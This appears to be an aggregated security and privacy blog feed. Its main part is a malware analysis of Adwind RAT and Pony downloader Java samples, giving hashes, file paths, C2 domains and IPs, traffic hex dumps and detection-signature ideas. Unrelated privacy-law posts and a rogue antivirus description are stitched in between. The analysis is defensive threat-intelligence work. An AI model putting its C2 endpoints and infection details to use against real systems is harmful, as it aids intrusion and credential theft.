TaskNetworkGathor267205042636993976.reg (.txt) "Text file"
tem.txt (.txt) "Text file"
VblVc5kEqY.tmp (.txt) "Text file"

MD5 list
Desktop.ini     e783bdd20a976eaeaae1ff4624487420
index.dat       b431d50792262b0ef75a3d79a4ca4a81
LcuSMagrlF.txt  79e9dd35aef6558461c4b93cd0c55b76
79e9dd35aef6558461c4b93cd0c55b76.malware       79e9dd35aef6558461c4b93cd0c55b76
TaskNetworkGathor267205042636993976.reg        6486acf0ca96ecdc981398855255b699 << Strings are here
tem.txt         d41d8cd98f00b204e9800998ecf8427e
VblVc5kEqY.tmp  b5c6ea9aaf042d88ee8cd61ec305880b

III
B2856B11FF23D35DA2C9C906C61781BA Purchase Order.jar
File paths
%USERPROFILE%\Application Data\Sys32\Desktop.ini
%USERPROFILE%\Application Data\Sys32\Windows.jar.txt
%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014111620141117\index.dat
%USERPROFILE%\Local Settings\Temp\hsperfdata_Laura\1132
%USERPROFILE%\WWMI853JfC.tmp
deleted_files\%USERPROFILE%\Local Settings\Temp\TaskNetworkGathor7441169770678304780.reg
deleted_files\%USERPROFILE%\Local Settings\History\History.IE5\MSHist012013110920131110\index.dat
deleted_files\%USERPROFILE%\WWMI853JfC.tmp
deleted_files\C\DFRA.tmp

deleted_files\C\WINDOWS\tem

File type list
Desktop.ini (.txt) "Text file"
DFRA.tmp (.txt) "Text file"
index.dat (.txt) "Text file"
TaskNetworkGathor7441169770678304780.reg (.txt) "Text file"
tem (.txt) "Text file"
Windows.jar.txt (.zip) "PKZIP Compressed"

WWMI853JfC.tmp (.txt) "Text file"

MD5 list
Desktop.ini     e783bdd20a976eaeaae1ff4624487420
DFRA.tmp        d41d8cd98f00b204e9800998ecf8427e
index.dat       b431d50792262b0ef75a3d79a4ca4a81
purchase.jar    b2856b11ff23d35da2c9c906c61781ba
TaskNetworkGathor7441169770678304780.reg       311af3b9a52ffc58f46ad83afb1e93b6
tem             d41d8cd98f00b204e9800998ecf8427e
Windows.jar.txt b2856b11ff23d35da2c9c906c61781ba
WWMI853JfC.tmp  8e222c61fc55c230407ef1eb21a7daa9



Traffic Information

Java Serialization Protocol traffic info

DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - Windows XP
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 2a 1f 8b  08 00 00 00 00 00 00 00 xp...*.. ........
00000025  6d 54 dd 8e d3 46 18 1d  12 16 b2 bb 59 40 fc 5d mT...F.. ....Y@.]
00000035  bb 52 2b 71 83 d7 76 1c  3b a1 12 10 58 16 36 2c .R+q..v. ;...X.6,
00000045  14 95 56 1b 24 4b d6 17  7b 9c cc 66 3c e3 ce 8c ..V.$K.. {..f<...
00000055  d7 a6 17 7d 8e 3e 44 1f  a0 12 2f c1 43 f4 b6 ef ...}.>D. ../.C...
00000065  d0 cf 6c 76 1d 2a 22 d9  19 7b be 9f 73 be 73 c6 ..lv.*". .{..s.s.
00000075  7f fd 4b b6 b4 22 77 4f  e1 0c ec d2 30 6e bf 53 ..K.."wO ....0n.S

DB46ADCFAE462E7C475C171FBE66DF82 traffic capture - OSX Lion
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 33 1f 8b  08 00 00 00 00 00 00 00 xp...3.. ........
00000025  75 54 cd 6e db 46 10 de  c8 b5 2d ff 26 c8 1f 7a uT.n.F.. ..-.&..z
00000035  54 0f 45 7b d1 92 5c d1  94 89 02 4d 94 c0 b1 a5 T.E{..\. ...M....
00000045  d8 4d 51 23 89 73 22 56  dc a5 b5 16 b9 cb ec 2e .MQ#.s"V ........

B2856B11FF23D35DA2C9C906C61781BA on Windows XP
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 63 1f 8b  08 00 00 00 00 00 00 00 xp...c.. ........
00000025  6d 54 5d 6e db 46 10 de  48 91 2d db 8a 13 24 41 mT]n.F.. H.-...$A
00000035  fa ca 3e 14 08 0a 84 e6  bf a4 16 68 9a c4 75 1b ..>..... ...h..u.
00000045  c3 6e 0d b8 85 13 80 00  31 22 57 d2 5a e4 ee 76 .n...... 1"W.Z..v

79E9DD35AEF6558461C4B93CD0C55B76 - Windows XP
00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  75 72 00 02 5b 42 ac f3  17 f8 06 08 54 e0 02 00 ur..[B.. ....T...
00000014  00                                               .
00000015  78 70 00 00 03 69 1f 8b  08 00 00 00 00 00 00 00 xp...i.. ........
00000025  6d 54 dd 6e db 36 14 66  ed fc 38 89 9b 16 ed d0 mT.n.6.f ..8.....
00000035  de 6a 17 03 8a 01 53 28  d9 92 ed 0d e8 d6 34 71 .j....S( ......4q

00000045  b6 c0 19 02 64 69 3b c0  80 70 2c d1 36 6d 4a 62 ....di;. .p,.6mJb



Serialization Protocol decoding:


The following fields are part of the serialization protocol and are 'benign" and common.

AC ED (¬í) - Java Serialization protocol magic STREAM_MAGIC = (short)0xaced. 
00 05    -  Serialization Version STREAM_VERSION
75    (u) - Specifies that this is a new array - newArray: TC_ARRAY
72          (r) -  Specifies that this is a new class - newClassDesc: TC_CLASSDESC
00 02        - Length of the class name
5B 42 AC F3 17 F8 06 08 54 E0 ([B¬ó.ø..Tà) This is a Serial class name and version identifier section but data appears to be encrypted
02 00   - Is Serializable Flag - SC_SERIALIZABLE 
78 70  (xp)  - some low-level information identifying serialized fields
1f 8b 08 00 00 00 00 00 00 00 - GZIP header as seen in the serialization stream

As you see, all Windows traffic captures have identical fields  following the GZIP stream, while OSX traffic has different data. The jar files that had Pony Downloader payload did not have other OSX malware packaged and I saw no activity on OSX other than calling the C2 and writing to the randomly named timestamp file (e.g VblVc5kEqY.tmp - updating current timestamp in Unix epoch format)

Combination of the Stream Magic exchange, plus all other benign fields in this order will create a usable signature. However, it will be prone to false positives unless you use fields after the GZIP header for OS specific signatures

Another signature can be based on the transfer. jar download as seen below


DB46ADCFAE462E7C475C171FBE66DF82  - downloading fab8de636d6f1ec93eeecaade8b9bc68 
iWimMQLgpsT2624529381479181764.png (seen Transfer.jar in the stream) , which contains 15555.jar in Manifest.mf, which contains 15555.exe (Pony loader) in its' Manfest.mf

IHEAKA _000C297  << IHEAKA is the name of the RAT client, it is different in each infection.

00000000  ac ed 00 05                                      ....
    00000000  ac ed 00 05                                      ....
00000004  77 04                                            w.
00000006  00 00 00 01                                      ....
0000000A  77 15                                            w.
0000000C  00 13 49 48 45 41 4b 41  5f 30 30 30 43 32 39 37 ..IHEAKA _000C297
0000001C  42 41 38 44 41                                   BA8DA
    00000004  77 0e 00 0c 54 72 61 6e  73 66 65 72 2e 6a 61 72 w...Tran sfer.jar
    00000014  7a 00 00 04 00 50 4b 03  04 14 00 08 08 08 00 46 z....PK. .......F
    00000024  0c 71 45 00 00 00 00 00  00 00 00 00 00 00 00 14 .qE..... ........
    00000034  00 04 00 4d 45 54 41 2d  49 4e 46 2f 4d 41 4e 49 ...META- INF/MANI
    00000044  46 45 53 54 2e 4d 46 fe  ca 00 00 4d 8d 4d 0b c2 FEST.MF. ...M.M..

---- snip----

000ABBA0  00 09 00 00 00 31 35 35  35 35 2e 6a 61 72 74 97 .....155 55.jart.
    000ABBB0  43 70 26 8c a2 44 63 db  9c d8 b6 9d 7c b1 6d db Cp&..Dc. ....|.m.
    000ABBC0  c6 c4 b6 6d db b6 6d db  99 d8 76 f2 fe e5 dd bc ...m..m. ..v.....


Pony downloader traffic

 HTTP requests
URL: http://meetngreetindia.com/scala/gate.php
TYPE: POST
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
URL: http://meetngreetindia.com/scala/gate.php
TYPE: GET
USER AGENT: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
 DNS requests
meetngreetindia.com (50.28.15.25)
 TCP connections
50.28.15.25:80

IP: 50.28.15.25
Decimal: 840699673
Hostname: mahanadi3.ewebguru.net
ISP: Liquid Web
Organization: eWebGuru
State/Region: Michigan
City: Lansing

https://www.virustotal.com/en/ip-address/50.28.15.25/information/




IP-Domain Information
I
DB46ADCFAE462E7C475C171FBE66DF82 paymentadvice.jar 
IP: 204.45.207.40
Decimal: 3425554216
Hostname: 212.clients.instantdedis.com
ISP: FDCservers.net
Country: United States
State/Region: Colorado
City: Denver

meetngreetindia.com (50.28.15.25)
 TCP connections
50.28.15.25:80
Decimal: 840699673
Hostname: mahanadi3.ewebguru.net
ISP: Liquid Web
Organization: eWebGuru
State/Region: Michigan
City: Lansing

II
79E9DD35AEF6558461C4B93CD0C55B76 Purchase order.jar
IP: 38.89.137.248
Decimal: 643402232
Hostname: 38.89.137.248
ISP: Cogent Communications
Country: United States us flag

III
2856B11FF23D35DA2C9C906C61781BA Purchase order.jar
installone.no-ip.biz
IP Address:   185.32.221.17
Country:      Switzerland
Network Name: CH-DATASOURCE-20130812
Owner Name:   Datasource AG
From IP:      185.32.220.0
To IP:        185.32.223.255
Allocated:    Yes
Contact Name: Rolf Tschumi
Address:      mgw online service, Roetihalde 12, CH-8820 Waedenswil
Email:        rolf.tschumi@mgw.ch
Abuse Email:  abuse@softplus.net
   








Virustotal

https://www.virustotal.com/en/file/02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45/analysis/SHA256: 02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45
MD5 db46adcfae462e7c475c171fbe66df82
SHA1 2b43211053d00147b2cb9847843911c771fd3db4
SHA256 02d1e6dd2f3eecf809d8cd43b5b49aa76c6f322cf4776d7b190676c5f12d6b45
ssdeep3072:VR/6ZQvChcDfJNBOFJKMRXcCqfrCUMBpXOg84WoUeonNTFN:LdvCGJN0FJ1RXcgBpXOjOjSNTFN
File size 128.1 KB ( 131178 bytes )
File type ZIP
Magic literalZip archive data, at least v2.0 to extract
TrID ZIP compressed archive (100.0%)
File name: Payment Advice.jar
Detection ratio: 6 / 54
Analysis date: 2014-11-16 20:58:08 UTC ( 1 day, 4 hours ago )
Ikarus Trojan.Java.Adwind 20141116
TrendMicro JAVA_ADWIND.XXO 20141116
TrendMicro-HouseCall JAVA_ADWIND.XXO 20141116
DrWeb Java.Adwind.3 20141116
Kaspersky HEUR:Trojan.Java.Generic 20141116
ESET-NOD32 a variant of Java/Adwind.T 20141116

https://www.virustotal.com/en/file/733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c/analysis/1416194595/
SHA256: 733c037f886d91b6874ac4a2de5b32ca1e7f7f992928b01579b76603b233110c
MD5 fab8de636d6f1ec93eeecaade8b9bc68
File name: iWimMQLgpsT2624529381479181764.png
Detection ratio: 23 / 53
Analysis date: 2014-11-17 03:23:15 UTC ( 0 minutes ago )
AVG Zbot.URE 20141116
Qihoo-360 Win32/Trojan.fff 20141117
ESET-NOD32 Win32/PSW.Fareit.A 20141117
Fortinet W32/Inject.SXVW!tr 20141117
Antiy-AVL Trojan[PSW]/Win32.Tepfer 20141117
AVware Trojan.Win32.Generic!BT 20141117
DrWeb Trojan.PWS.Stealer.13319 20141117
Symantec Trojan.Maljava 20141117
McAfee RDN/Generic Exploit!1m3 20141117
McAfee-GW-Edition RDN/Generic Exploit!1m3 20141117
Sophos Mal/JavaJar-A 20141117
Avast Java:Malware-gen [Trj] 20141117
Cyren Java/Agent.KS 20141117
F-Prot Java/Agent.KS 20141117
Kaspersky HEUR:Trojan.Java.Generic 20141117
Emsisoft Gen:Variant.Kazy.494557 (B) 20141117
Ad-Aware Gen:Variant.Kazy.494557 20141117
BitDefender Gen:Variant.Kazy.494557 20141117
F-Secure Gen:Variant.Kazy.494557 20141116
GData Gen:Variant.Kazy.494557 20141117
MicroWorld-eScan Gen:Variant.Kazy.494557 20141117
Ikarus Exploit.Java.Agent 20141117
Norman Adwind.E 20141116

https://www.virustotal.com/en/file/91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725/analysis/
MD5 b5e7cd42b45f8670adaf96bbca5ae2d0
SHA256: 91d71b06c99fe25271ba19c1c47c2d1ba85e78c2d7d5ae74e97417dc958dc725
File name: asdqw4727319084772952101234.exe
Detection ratio: 12 / 54
Analysis date: 2014-11-17 03:21:30 UTC
AVG Zbot.URE 20141116
AVware Trojan.Win32.Generic!BT 20141117
Ad-Aware Gen:Variant.Kazy.494557 20141117
Antiy-AVL Trojan[PSW]/Win32.Tepfer 20141116
BitDefender Gen:Variant.Kazy.494557 20141117
DrWeb Trojan.PWS.Stealer.13319 20141117
ESET-NOD32 Win32/PSW.Fareit.A 20141117
Emsisoft Gen:Variant.Kazy.494557 (B) 20141117
F-Secure Gen:Variant.Kazy.494557 20141116
GData Gen:Variant.Kazy.494557 20141117
MicroWorld-eScan Gen:Variant.Kazy.494557 20141117
Qihoo-360 Win32/Trojan.fff 20141117




TRUSTe Reaches Settlement with FTC Over Alleged FTC Act Violations

On November 17, 2014, the Federal Trade Commission announced that data privacy certifier True Ultimate Standards Everywhere, Inc. (“TRUSTe”) has agreed to settle charges that the company deceived consumers about its recertification program and misrepresented that it was a non-profit entity in violation of Section 5 of the FTC Act.

TRUSTe offers a variety of assessments and certifications (“Certified Privacy Seals”) for online business websites and mobile applications. The Certified Privacy Seals are based on meeting certain standards related to the transparency of the company’s data practices and the choices available to consumers regarding the collection and use of their personal information. The Certified Privacy Seals help assure consumers that TRUSTe clients are compliant with privacy standards such as the Children’s Online Privacy Protection Act and the U.S.-EU Safe Harbor Framework.

In its complaint against TRUSTe, the FTC alleged that from 2006 to January 2013, the company failed to conduct an annual review of its clients’ compliance with TRUSTe’s Certified Privacy Seals requirements in over 1,000 instances. The FTC also accused TRUSTe of misrepresenting its corporate status by recertifying numerous clients that referred to TRUSTe as a non-profit entity after it became a for-profit company in July 2008.

In the proposed consent order, TRUSTe agreed to (1) a number of requirements and restrictions related to its Certified Privacy Seals program and (2) pay $200,000. Under the consent order, the company must provide the FTC with an annual sworn statement during the next 10 years containing information about its certification programs, including the total number of new seals awarded and detailed explanations of its certification criteria. The consent order also prohibits the company from misrepresenting its certification process, the certification of its clients or its corporate status.

“TRUSTe promised to hold companies accountable for protecting consumer privacy, but it fell short of that pledge,” said FTC Chairwoman Edith Ramirez. “Self-regulation plays an important role in helping to protect consumers…But when companies fail to live up to their promises to consumers, the FTC will not hesitate to take action.”

Update: On March 18, 2015, the FTC approved the final settlement order with TRUSTe.

OnionDuke samples










File attributes

Size: 219136
MD5:  28F96A57FA5FF663926E9BAD51A1D0CB

Size: 126464
MD5:  C8EB6040FD02D77660D19057A38FF769


Size: 316928
MD5:  D1CE79089578DA2D41F1AD901F7B1014


Virustotal info

https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/
SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Analysis date: 2014-11-15 18:37:30 UTC ( 8 hours, 44 minutes ago ) 
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115

https://www.virustotal.com/en/file/366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b/analysis/


SHA256: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
File name: 366affd094cc63e2c19c5d57a6866b487889dab5d1b07c084fff94262d8a390b
Detection ratio: 8 / 52
Antivirus Result Update
Baidu-International Trojan.Win32.Agent.adYf 20141107
F-Secure Backdoor:W32/OnionDuke.B 20141115
Ikarus Trojan.Win32.Agent 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
Norman OnionDuke.A 20141115
Sophos Troj/Ransom-ALA 20141115
Symantec Backdoor.Miniduke!gen4 20141115
Tencent Win32.Trojan.Agent.Tbsl 20141115

https://www.virustotal.com/en/file/0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade/analysis/
SHA256: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
File name: 0102777ec0357655c4313419be3a15c4ca17c4f9cb4a440bfb16195239905ade
Detection ratio: 19 / 55
Analysis date: 2014-11-15 18:37:25 UTC ( 8 hours, 47 minutes ago ) 
Antivirus Result Update
AVware Trojan.Win32.Generic!BT 20141115
Ad-Aware Backdoor.Generic.933739 20141115
Baidu-International Trojan.Win32.OnionDuke.BA 20141107
BitDefender Backdoor.Generic.933739 20141115
ESET-NOD32 a variant of Win32/OnionDuke.A 20141115
Emsisoft Backdoor.Generic.933739 (B) 20141115
F-Secure Backdoor:W32/OnionDuke.A 20141115
GData Backdoor.Generic.933739 20141115
Ikarus Trojan.Win32.Onionduke 20141115
Kaspersky Backdoor.Win32.MiniDuke.x 20141115
McAfee RDN/Generic BackDoor!zw 20141115
McAfee-GW-Edition BehavesLike.Win32.Trojan.fh 20141114
MicroWorld-eScan Backdoor.Generic.933739 20141115
Norman OnionDuke.B 20141115
Sophos Troj/Ransom-ANU 20141115
Symantec Backdoor.Miniduke!gen4 20141115
TrendMicro BKDR_ONIONDUKE.AD 20141115
TrendMicro-HouseCall BKDR_ONIONDUKE.AD 20141115
VIPRE Trojan.Win32.Generic!BT 20141115


Ebola and Other Health Emergencies Create Workplace Privacy Dilemmas

Hunton & Williams Labor & Employment partner Susan Wiltsie reports:

Fears of a worldwide Ebola pandemic appear to have abated, but the tension between workplace safety and employee privacy, thrown into relief by this health emergency, remains an issue relevant to all employers. Any potential health threat created by contagious illness requires employers to plan and put into effect a reasonable response, including policies governing the terms and conditions under which employees may be required to stay away from the workplace, and in which their health care information may be relevant to workplace decisions.

The likelihood of contracting Ebola from employees who may have been exposed to the disease is low, and fears of association with such individuals usually are scientifically unfounded. The decision regarding whether potentially exposed individuals should be barred from the workplace is particularly difficult. Employers do not want to appear hysterical; yet they need to be prudent about protecting co-workers, customers, visitors and vendors. Also, a very real risk exists that an infected employee on a manufacturing floor or otherwise in the chain of commerce could create a panicked boycott of the goods/services of their employer. As one way to address these issues, some employers have adopted policies that those employees who travel to the impacted areas in West Africa will not be able to return to work until 21 days after their last possible exposure. Such policies make particular sense for employers in the health care field. In cases where the employee has not made a choice – for example, when an employee is identified by public health officials as someone who may have been exposed, employers may decide to have any mandated leave time be paid. Telecommuting, if feasible, also is a good option. In unionized workplaces, these issues normally will be mandatory subjects of bargaining; employers who unilaterally implement such procedures may be engaging in unfair labor practices in violation of the National Labor Relations Act.

No approach to these issues will be free from legal risk.  Attempts to limit access to the workplace also expose employers to claims of discrimination under the Americans with Disabilities Act (“ADA”) or (for entities receiving federally funded assistance) the Rehabilitation Act of 1973 (“Rehab Act”). In addition to protecting qualified applicants and employees with disabilities from employment discrimination, these statutes prohibit discrimination based on an employee’s relationship or association with an individual who has a disability. See 42 U.S.C. § 12112(b)(4). Although temporary viral illnesses do not normally meet the definition of “disability” under the ADA, some Ebola-related conditions and long-term side effects may rise to that level, particularly in light of the more expansive definition of the term “disability” under the Americans with Disabilities Act Amendments Act of 2008.

Significantly, there is no requirement under the ADA or the Rehab Act that the employee’s association with a person potentially exposed to Ebola be a family relationship. The key question is whether the employer is motivated by an individual’s relationship or association with any person who has a disability. The Equal Employment Opportunity Commission’s publication entitled “Questions and Answers About the Association Provision of the Americans with Disabilities Act” provides helpful guidance on this issue, implicitly acknowledging a zone of privacy around an individual’s personal associational choices.

Perhaps the thorniest privacy issue facing employers with regard to contagious illnesses is the extent to which they may disclose information about an employee’s medical condition. Media attention to the particulars of each diagnosed case of Ebola outside of West Africa presents employers (particularly health care providers) with the Hobson’s choice of being transparent enough to reassure the public and opaque enough to protect employee privacy.

The Health Insurance Portability and Accountability Act of 1996 (“HIPAA”), enforced by the Office for Civil Rights of the Department of Health and Human Services, protects the confidentiality of protected health information by generally prohibiting its disclosure in the absence of explicit authorization from a patient. However, HIPAA applies only to health plans, health care clearinghouses, and most health care providers. It does not apply to employers – for instance, if an employer provides a self-insured health plan for employees, the plan, but not the employer, is subject to HIPAA. Moreover, HIPAA specifically exempts disclosures of health information made for purposes of worker’s compensation-related matters.

Thus, the significant amount of employee health information to which employers obtain access by virtue of standard workplace policies and procedures – medical appointment verification forms from physicians, verification of conditions qualifying for family and medical leave, explanations for routine absences, drug testing results, the results of medical examinations that are rationally related to job duties – is not subject to certain HIPAA requirements. Analogous state laws may provide greater protection. California’s Confidentiality of Medical Information Act, for instance, requires employers to protect the privacy and security of any medical information they receive. (Cal. Civ. Code §§ 56.20-56.245.) At bottom, however, most employers are more likely to face liability for disclosure of medical information under common law invasion of privacy theories (e.g., unreasonable intrusion upon seclusion) than under HIPAA or analogous state statutes.

Employee concerns about co-workers with contagious illnesses may be channeled into productive and appropriate efforts to prevent contagion. These may include education and training of employees, medical services such as vaccination and post-exposure medicine, modifying the work environment to provide additional protection, such as installing physical barriers (clear plastic sneeze guards), conducting business through drive-through service windows, improving ventilation, installing additional hand sanitizer dispensers and, where appropriate, providing protective personal equipment such as respirators and surgical masks.

While Ebola does not meet the definition of “pandemic,” OSHA’s general guidance on protecting workers during a pandemic prescribes evaluation of contagion risks based on specific job activities that may expose people to infection. Emergency responders and workers in critical infrastructure and key resource sectors (including employees in the fields of health care, laboratory work, mortuary/death care, emergency transport and airline services) face greater risks of infection than employees who do not regularly interact with the general public. OSHA regulations prescribe safety standards for such individuals, including OSHA’s Bloodborne Pathogens standard (29 CFR 1910.1030), Respiratory Protection standard (29 CFR 1910.134), and Personal Protective Equipment standard (29 CFR 1910.132).

Thoughtful and deliberate planning at the senior levels of an organization, ongoing monitoring of the most recent reports and recommendations from the CDC, the WHO and other health organizations, and investment in employee education and training will allow employers to safely navigate competing concerns about workplace safety and worker privacy.

IAPP Europe Data Protection Congress 2014

Join us at the International Association of Privacy Professionals (“IAPP”) Data Protection Congress in Brussels, November 18-20, 2014. Hunton & Williams privacy professionals will be featured speakers in the following sessions:

  • Internet of Things, Data Protection and Security: What are the Legal Challenges, and How Do We Overcome Them?
    Preconference Workshop: Tuesday, November 18, 2:00 p.m.
    Dr. Jörg Hladjk, counsel, Hunton & Williams; Mathias Cellarius, Data Protection Officer and Head of Regulatories and Processes Global Legal, SAP SE; Ioannis Krontiris, Privacy Expert, European Research Center, Huawei Technologies; and Stefan Schiffner, Expert in Network & Information Security, ENISA.
  • Adviser? Auditor? Enforcer? Facilitator? The Evolving Role of the DPO
    Wednesday, November 19, 11:30 a.m.
    Speakers include: Bridget Treacy, partner, Hunton & Williams; Tobias Brautigam, Senior Legal Counsel, Microsoft Corporation; Yvonne Cunnane, Head of Data Protection, Facebook; Stephan Geering, EMEA Data Protection Officer, Citigroup; and Philippe Renaudière, Data Protection Officer, European Commission.
  • Privacy Risk Framework and Risk-Based Approach: Delivering Effective Data Protection in Practice
    Wednesday, November 19, 5:15 p.m.
    Speakers include: Bojana Bellamy, President, Centre for Information Policy Leadership at Hunton & Williams LLP; Mikko Niva, Director of Privacy, Nokia Corporation; and JoAnn C. Stonier, Executive Vice President, Information Governance and Chief Privacy Officer, MasterCard.
  • EU BCRs and APEC CBPRs: Cornerstones for Future Interoperability?
    Wednesday, November 19, 5:15 p.m.
    Markus Heyder, Vice President and Senior Policy Counselor, Centre for Information Policy Leadership at Hunton & Williams LLP will moderate the panel. Speakers include:  Wim Nauwelaerts, partner, Hunton & Williams; Christina Peters, Chief Privacy Officer, IBM Corporation; Daniel Pradelles, EMEA Privacy Officer, Hewlett-Packard; Florence Raynal, Head of the Department of European and International Affairs, CNIL; and Hilary Wandall, Compliance and Chief Privacy Officer, Merck & Co., Inc.
  • Making Accountability Work for You
    Thursday, November 20, 9:00 a.m.
    Bridget Treacy will moderate the panel. Speakers include: Ellis I. Parry, Global Lead of Data Privacy, BP International Ltd. and Louise Thorpe, Vice President of Global Privacy, American Express.

In addition to these panels, stop by Booth 17 in the Exhibit Hall to learn more about Hunton & Williams’ Global Privacy and Cybersecurity practice and its Centre for Information Policy Leadership. Visit the IAPP’s website for more information and the full conference schedule.

Sirius Multirogue 2014

This Chameleon fake Antivirus is looking for the OS version (XP, Vista, Seven) and changes its name and skin: Sirius Win 7 Protection 2014, Sirius Win 8 Antivirus 2014, Sirius Vista Protection 2014, (...). It detects fake infections and displays alert messages to scare users. It belongs to the Braviax/FakeRean family.

Windows Antivirus Adviser

Windows Antivirus Adviser is a fake Antivirus. This rogue displays fake alerts to scare users. It replaces Windows Internet Guard, Windows Internet Watchdog, Windows Web Watchdog, Windows AntiBreach Patrol, Windows Antivirus Patrol, Windows Pro Defence Kit, Windows Security Master, Windows Defence Unit, Windows Protection Booster, Windows AntiVirus Booster, Windows AntiVirus Helper, Windows AntiVirus Tool, Windows Antivirus Suite, Windows AntiBreach Helper, Windows AntiBreach Suite, Windows AntiBreach Tool, Windows Paramount Protection, Windows Antivirus Master, Windows Safety Master, Windows Ultimate Booster, Windows Efficiency Kit, Windows Prime Accelerator, Windows Prime Shield, Windows Prime Booster, Windows Virtual Protector, Windows Accelerator Pro, Windows Premium Shield, Windows Efficiency Console, Windows Activity Booster, Windows Warding Module, Windows Active HotSpot, Windows Cleaning Toolkit, Windows Expert Console, Windows Safety Series, Windows Secure Workstation, Windows Anti-Malware Patch, Windows Virtual Security, Windows Antivirus Release, Windows Interactive Safety, Windows Ultimate Safeguard, Windows Antivirus Machine, Windows Active Guard, Windows Security Renewal, Windows Home Patron, Windows Virtual Firewall, Windows Premium Defender, Windows Web Combat, Windows Virtual Angel, Windows Profound Security, Windows Expert Series, Windows Virus Hunter, Windows Web Commander, Windows Interactive Security, Windows Proprietary Advisor, Windows Privacy Extension, Windows Custom Management, Windows Pro Defence, Windows Control Series, Windows Advanced Toolkit, Windows Proactive Safety, Windows Maintenance Guard, Windows Secure Web Patch, Windows Active Defender, Windows Instant Scanner, Windows Privacy Counsel, Windows Custom Safety, Windows Privacy Module, Windows Maintenance Suite, Windows PC Aid, Windows Safety Wizard, Windows TurnKey Console, Windows Malware Firewall, Windows Antivirus Rampart, Windows Ultimate Security Patch, Windows Defence Counsel, Windows Guard Tools, Windows Safety Maintenance, Windows Multi Control System, Windows Pro Safety, Windows Private Shield, Windows Pro Safety Release, Windows Safeguard Upgrade, Windows Secure Surfer, Windows Be-on-Guard Edition, Windows Abnormality Checker, Windows Pro Solutions, Windows Sleek Performance, Windows ProSecurity Scanner, Windows Advanced User Patch, Windows Internet Booster, Windows Pro Web Helper, Windows Daily Adviser, Windows Safety Module, Windows High-End Protection, Windows Recovery Series, Windows Safety Checkpoint, Windows Premium Guard, Windows Efficiency Accelerator, Windows Performance Adviser, Windows Pro Rescuer, Windows Safety Toolkit, Windows Antivirus Care, Windows Guard Solutions, Windows Safety Manager, Windows Antivirus Patch, Windows Protection Unit, Windows Crucial Scanner, Windows Foolproof Protector, Windows Antibreaking System, Windows Component Protector, Windows Cleaning Tools, Windows Stability Maximizer, Windows Processes Accelerator, Windows Efficiency Reservoir, Windows Care Taker, Windows Custodian Utility, Windows Shielding Utility, Windows Warding System, Windows Activity Debugger, Windows First-Class Protector, Windows Trouble Taker, Windows Managing System, Windows Defending Center, Windows Debug Center, Windows No-Risk Agent, Windows Software Saver, Windows Antihazard Helper, Windows AntiHazard Center, Windows Process Director, Windows Guardian Angel, Windows Software Keeper, Windows Problems Stopper, Windows Health Keeper, Windows No-Risk Center, Windows Antihazard Solution, Windows Risk Minimizer, Windows Managing System, Windows Safety Tweaker, Windows Tools Patch, Windows Personal Doctor, Windows Personal Detective, Windows Trojans Sleuth, Windows Malware Sleuth, Windows Trojans Inspector, Windows Attacks Defender, Windows Attacks Preventor, Windows Threats Destroyer, Windows Firewall Constructor, Windows Stability Guard, Windows Basic Antivirus, Windows PRO Scanner, Windows Shield Tool, Windows Telemetry Center, Windows Performance Catalyst, Windows Smart Partner, Windows Smart Warden, Windows Functionality Checker, Windows Protection Master




To register (and help removal), copy paste this code: 0W000-000B0-00T00-E0021

Thanks to @kafeine for the sample

GPEN Holds Workshop on the Use of Publicity as a Regulatory Compliance Technique

On November 1, 2014, the Global Privacy Enforcement Network (“GPEN”) posted a media release on their workshop held on October 12, 2014, in Mauritius on the use of publicity as a regulatory compliance technique. The workshop, attended by 44 commissioners and staff from around the world, focused on different issues concerning privacy enforcement, including the effectiveness of monetary penalties in enforcing data protection laws and the diverse approaches to enforcement publicity. In addition, there was a public demonstration of the recently expanded World Legal Information Institute’s International Privacy Law Library, which is said to be the largest freely accessible and searchable database of privacy law materials in the world.

GPEN is a network of approximately 50 privacy enforcement authorities from around the world. The network’s U.S. members include the Federal Trade Commission and the Federal Communications Commission. GPEN’s mission is to connect “privacy enforcement authorities from around the world to promote and support cooperation in cross-border enforcement of laws protecting privacy.” GPEN’s past activities have included coordinated international enforcement sweeps concerning such issues as mobile app privacy and privacy notices posted by major websites.

UK ICO Issues Code of Practice Regarding the Use of Surveillance Cameras

